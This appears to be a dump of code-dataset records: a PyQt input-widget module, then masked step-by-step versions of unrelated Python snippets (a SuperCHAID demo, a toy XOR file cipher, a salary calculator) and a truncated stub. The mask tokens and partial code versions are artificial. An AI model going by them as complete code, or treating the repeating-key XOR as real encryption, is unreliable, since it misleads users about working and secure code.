super(InputWidgetSingle, self).__init__(parent=parent, dataSetCallback=dataSetCallback, defaultValue=defaultValue, userStructClass=userStructClass, **kwds)\n # from widget\n self.bWidgetSet = False\n self.gridLayout = QGridLayout(self)\n self.gridLayout.setSpacing(1)\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.horizontalLayout = QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n\n spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.horizontalLayout.addItem(spacerItem)\n self.pbReset = QPushButton(self)\n self.pbReset.setMaximumSize(QtCore.QSize(25, 25))\n self.pbReset.setText(\"\")\n self.pbReset.setObjectName(\"pbReset\")\n self.pbReset.setIcon(QtGui.QIcon(\":/icons/resources/reset.png\"))\n self.horizontalLayout.addWidget(self.pbReset)\n self.pbReset.clicked.connect(self.onResetValue)\n\n self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)\n self._index = 0\n\n def setWidget(self, widget):\n self.horizontalLayout.insertWidget(self._index, widget)\n\n\nclass ExecInputWidget(InputWidgetSingle):\n \"\"\"docstring for ExecInputWidget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(ExecInputWidget, self).__init__(parent=parent, **kwds)\n self.pb = QPushButton('execute', self)\n self.setWidget(self.pb)\n self.pb.clicked.connect(self.dataSetCallback)\n self.pbReset.deleteLater()\n def setObjectName(self,name):\n super(ExecInputWidget, self).setObjectName(name)\n self.pb.setText(name.split(\".\")[-1])\n\nclass EnumInputWidget(InputWidgetSingle):\n \"\"\"\n Enum input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(EnumInputWidget, self).__init__(parent=parent, **kwds)\n # self._userStruct = kwds['userStructClass']\n self.cb = QComboBox(self)\n self.setWidget(self.cb)\n for i in list(kwds['userStructClass']):\n self.cb.addItem(i.name, i.value)\n self.cb.currentIndexChanged[int].connect(self.dataSetCallback)\n\n def 
setWidgetValue(self, val):\n self.cb.setCurrentIndex(val)\n\n\nclass FloatInputWidget(InputWidgetSingle):\n \"\"\"\n Floating point data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(FloatInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QDoubleSpinBox(self)\n _configDoubleSpinBox(self.sb)\n self.setWidget(self.sb)\n # when spin box updated call setter function\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(float(val))\n\n\nclass IntInputWidget(InputWidgetSingle):\n \"\"\"\n Decimal number input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(IntInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QSpinBox(self)\n _configIntSpinBox(self.sb)\n self.setWidget(self.sb)\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(int(val))\n\n\nclass NoneInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(NoneInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n self.le.setEnabled(False)\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\nclass StringInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n def __init__(self, parent=None, **kwds):\n super(StringInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\n\nclass BoolInputWidget(InputWidgetSingle):\n \"\"\"Boolean data input widget\"\"\"\n def __init__(self, parent=None, **kwds):\n 
super(BoolInputWidget, self).__init__(parent=parent, **kwds)\n self.cb = QCheckBox(self)\n self.setWidget(self.cb)\n self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(val)))\n\n def setWidgetValue(self, val):\n if bool(val):\n self.cb.setCheckState(QtCore.Qt.Checked)\n else:\n self.cb.setCheckState(QtCore.Qt.Unchecked)\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n def __init__(self, **kwds):\n 
super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])\n\n\nclass 
Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([\n [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value()],\n [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value()]\n ])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13,\n self.dsbm21, self.dsbm22, self.dsbm23,\n self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = 
self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([\n [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value(), self.dsbm14.value()],\n [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n 
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(), self.dsbm34.value()],\n [self.dsbm41.value(), self.dsbm42.value(), self.dsbm43.value(), self.dsbm44.value()]\n ])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14,\n self.dsbm21, self.dsbm22, self.dsbm23, self.dsbm24,\n self.dsbm31, self.dsbm32, self.dsbm33, self.dsbm34,\n self.dsbm41, self.dsbm42, self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n 
m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\ndef getInputWidget(dataType, dataSetter, defaultValue, userStructClass):\n '''\n factory method\n '''\n if dataType == DataTypes.Float:\n return FloatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Int:\n return IntInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.String:\n return StringInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Bool:\n return BoolInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.FloatVector3:\n return FloatVector3InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.FloatVector4:\n return FloatVector4InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Quaternion:\n return QuatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Matrix33:\n return Matrix33InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Matrix44:\n return Matrix44InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n if dataType == DataTypes.Exec:\n return ExecInputWidget(dataSetCallback=dataSetter, 
defaultValue=None)\n if dataType == DataTypes.Enum:\n return EnumInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue, userStructClass=userStructClass)\n \n return NoneInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)\n",
"step-ids": [
59,
60,
62,
81,
103
]
}
|
[
59,
60,
62,
81,
103
] |
"""Demo script: fit a SuperCHAID segmentation tree and run an imputing prediction.

Relies on the project's ``dataframe`` module for the data (``df``) and the
column-name constants (``manufacturing_region``, ``customer_region``,
``product_family``, ``make_vs_buy``, ``gm``), and on ``chaid`` for the
SuperCHAID implementation. Side effects: prints to stdout and exports a
tree visualization named "tree".
"""
from dataframe import *
from chaid import SuperCHAID, SuperCHAIDVisualizer
import numpy as np  # explicit import; don't rely on the star import above providing `np`

# Tree configuration — presumably one sub-tree per supernode-feature value,
# with features_list as the split candidates (verify against chaid module).
supernode_features = [manufacturing_region]
features_list = [customer_region, product_family, make_vs_buy]
dependant_variable = gm  # (sic) name kept as-is; module-level interface

super_tree = SuperCHAID(supernode_features, features_list, dependant_variable)
super_tree.fit(df)

# Export a visualization of the fitted tree to "tree".
visualizer = SuperCHAIDVisualizer(super_tree)
visualizer.export("tree")

# Build a probe row with one deliberately missing feature to exercise the
# impute path. Copy explicitly: `df.loc[0]` followed by item assignment is a
# chained assignment on a view/copy, which raises SettingWithCopyWarning and
# must not mutate the underlying dataframe.
input_row = df.loc[0].copy()
input_row[make_vs_buy] = np.nan
print(input_row[supernode_features + features_list])
print()

# predict() returns None when the row cannot be routed to a segment.
result = super_tree.predict(input_row, impute=True)
if result is not None:
    segment, segment_pairs, imputed_pairs = result
    print("Imputed pairs:", imputed_pairs)
    print("Supernode pairs:", segment.supernode_pairs)
    print("Segment pairs:", segment_pairs)
    print(segment)
|
normal
|
{
"blob_id": "0a42c54ef1412b7f3b8e95da1d65ee05dfa14089",
"index": 9709,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsuper_tree.fit(df)\n<mask token>\nvisualizer.export('tree')\n<mask token>\nprint(input_row[supernode_features + features_list])\nprint()\n<mask token>\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print('Imputed pairs:', imputed_pairs)\n print('Supernode pairs:', segment.supernode_pairs)\n print('Segment pairs:', segment_pairs)\n print(segment)\n",
"step-3": "<mask token>\nsupernode_features = [manufacturing_region]\nfeatures_list = [customer_region, product_family, make_vs_buy]\ndependant_variable = gm\nsuper_tree = SuperCHAID(supernode_features, features_list, dependant_variable)\nsuper_tree.fit(df)\nvisualizer = SuperCHAIDVisualizer(super_tree)\nvisualizer.export('tree')\ninput_row = df.loc[0]\ninput_row[make_vs_buy] = np.nan\nprint(input_row[supernode_features + features_list])\nprint()\nresult = super_tree.predict(input_row, impute=True)\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print('Imputed pairs:', imputed_pairs)\n print('Supernode pairs:', segment.supernode_pairs)\n print('Segment pairs:', segment_pairs)\n print(segment)\n",
"step-4": "from dataframe import *\nfrom chaid import SuperCHAID, SuperCHAIDVisualizer\nsupernode_features = [manufacturing_region]\nfeatures_list = [customer_region, product_family, make_vs_buy]\ndependant_variable = gm\nsuper_tree = SuperCHAID(supernode_features, features_list, dependant_variable)\nsuper_tree.fit(df)\nvisualizer = SuperCHAIDVisualizer(super_tree)\nvisualizer.export('tree')\ninput_row = df.loc[0]\ninput_row[make_vs_buy] = np.nan\nprint(input_row[supernode_features + features_list])\nprint()\nresult = super_tree.predict(input_row, impute=True)\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print('Imputed pairs:', imputed_pairs)\n print('Supernode pairs:', segment.supernode_pairs)\n print('Segment pairs:', segment_pairs)\n print(segment)\n",
"step-5": "from dataframe import *\nfrom chaid import SuperCHAID, SuperCHAIDVisualizer\n\nsupernode_features = [manufacturing_region]\nfeatures_list = [customer_region, product_family, make_vs_buy]\ndependant_variable = gm\n\nsuper_tree = SuperCHAID(supernode_features, features_list, dependant_variable)\nsuper_tree.fit(df)\n\nvisualizer = SuperCHAIDVisualizer(super_tree)\nvisualizer.export(\"tree\")\n\ninput_row = df.loc[0]\ninput_row[make_vs_buy] = np.nan\nprint(input_row[supernode_features + features_list])\nprint()\n\nresult = super_tree.predict(input_row, impute=True)\nif result is not None:\n segment, segment_pairs, imputed_pairs = result\n print(\"Imputed pairs:\", imputed_pairs)\n print(\"Supernode pairs:\", segment.supernode_pairs)\n print(\"Segment pairs:\", segment_pairs)\n print(segment)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
<|reserved_special_token_0|>
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
key = 'verystongk'
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
<|reserved_special_token_1|>
import inputoutput
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, 'b')
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, 'b')
key = 'verystongk'
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
<|reserved_special_token_1|>
import inputoutput
def xor_encryption(source, destination, key):
"""
Returns text encrypted or decrypted with xor
Keyword arguments:
source - path to file with text to be encrypted
destination - path to the file where you want to save the result
key - encryption key
"""
text = inputoutput.read_from_file(source, "b")
# text = read_from_file(source)
key = bytearray(key, 'utf-8')
result = bytearray()
for i in range(len(text)):
result.append(text[i] ^ key[i % len(key)])
inputoutput.write_to_file(result, destination, "b")
# def write_to_file(data, filename):
# """
# Write binary data to file
# Keyword arguments:
# data - binary data to be written
# filename - path to the file where you want to save the result
# """
# f = open(filename, 'wb')
# f.write(data)
# f.close()
# def read_from_file(filename):
# """
# Read binary data from file
# Keyword arguments:
# filename - path to the file where you want to save the result
# Returns:
# data - binary data from file
# """
# f = open(filename, 'rb')
# data = f.read()
# f.close()
# return data
key = 'verystongk'
# Шифрование
xor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)
# Расшифрование
xor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)
|
flexible
|
{
"blob_id": "81774d3b4d9fbf22ed19e1cba7ec5e8e3707f51a",
"index": 2076,
"step-1": "<mask token>\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\n<mask token>\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-3": "<mask token>\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\nkey = 'verystongk'\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-4": "import inputoutput\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, 'b')\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, 'b')\n\n\nkey = 'verystongk'\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-5": "import inputoutput\n\n\ndef xor_encryption(source, destination, key):\n \"\"\"\n Returns text encrypted or decrypted with xor\n\n Keyword arguments:\n source - path to file with text to be encrypted\n destination - path to the file where you want to save the result\n key - encryption key\n \"\"\"\n text = inputoutput.read_from_file(source, \"b\")\n # text = read_from_file(source)\n key = bytearray(key, 'utf-8')\n result = bytearray()\n for i in range(len(text)):\n result.append(text[i] ^ key[i % len(key)])\n inputoutput.write_to_file(result, destination, \"b\")\n\n\n# def write_to_file(data, filename):\n# \"\"\"\n# Write binary data to file\n\n# Keyword arguments:\n# data - binary data to be written\n# filename - path to the file where you want to save the result\n# \"\"\"\n# f = open(filename, 'wb')\n# f.write(data)\n# f.close()\n\n\n# def read_from_file(filename):\n# \"\"\"\n# Read binary data from file\n\n# Keyword arguments:\n# filename - path to the file where you want to save the result\n\n# Returns:\n# data - binary data from file\n# \"\"\"\n# f = open(filename, 'rb')\n# data = f.read()\n# f.close()\n# return data\n\n\nkey = 'verystongk'\n# Шифрование\nxor_encryption('sixth_practice/text.txt', 'sixth_practice/text1.txt', key)\n# Расшифрование\nxor_encryption('sixth_practice/text1.txt', 'sixth_practice/text2.txt', key)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
salario = float(input('Qual o valor do seu Salario atual? R$ '))
novo = salario + (salario * 15 / 100)
print('Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'.format(salario, novo))
|
normal
|
{
"blob_id": "ffcd3c0086ff73eb722d867b335df23382615d20",
"index": 1657,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n 'Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'\n .format(salario, novo))\n",
"step-3": "salario = float(input('Qual o valor do seu Salario atual? R$ '))\nnovo = salario + salario * 15 / 100\nprint(\n 'Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'\n .format(salario, novo))\n",
"step-4": "salario = float(input('Qual o valor do seu Salario atual? R$ '))\nnovo = salario + (salario * 15 / 100)\nprint('Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'.format(salario, novo))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def find_happy_number(num):
